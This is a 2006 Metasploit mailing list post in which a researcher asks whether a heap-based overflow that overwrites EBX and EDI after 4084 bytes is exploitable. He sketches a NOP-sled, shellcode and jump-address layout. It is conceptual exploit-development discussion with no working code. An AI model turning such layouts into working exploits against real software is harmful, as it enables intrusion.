Metasploit mailing list archives
EBX and EDI overwrite instead of EAX and EIP
From: Glinares at PCOnsite.com (Greg Linares)
Date: Mon, 23 Oct 2006 14:20:14 -0700
I might get flammed for this being not a specific metasploit related question, but once I get past this pain I plan on turning it into a metasploit module. If this question upsets you, I appologize in advance. Currently working on another buffer overflow and it seems that after 4084 bytes I can overwrite EBX and EDI with values only. [Buffer x 4084] [EDI overwrite value][EBX Overwrite value] And after loading a JMP to EDI in the EBX register I can get EAX to point somewhere in the x90 sled / Buffer / xcc cart. This is because this is a heap based overflow correct? (It's affecting a static local variable?) So I am assuming ill have to write something similar to this: [x90 Sled] [Shell Code] [EDI overwrite (JMP to EAX + Location of Shellcode)] [EBX overwrite (JMP to EDI)] I am assuming this is an exploitable vector but I could be wrong. Am I on the right path for this type of issue? Greg Linares -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20061023/321098b5/attachment.htm>
Current thread:
- EBX and EDI overwrite instead of EAX and EIP Greg Linares (Oct 23)
- EBX and EDI overwrite instead of EAX and EIP H D Moore (Oct 23)
- EBX and EDI overwrite instead of EAX and EIP Greg Linares (Oct 23)
- EBX and EDI overwrite instead of EAX and EIP H D Moore (Oct 23)
- EBX and EDI overwrite instead of EAX and EIP Greg Linares (Oct 23)
- EBX and EDI overwrite instead of EAX and EIP Greg Linares (Oct 23)
- EBX and EDI overwrite instead of EAX and EIP H D Moore (Oct 23)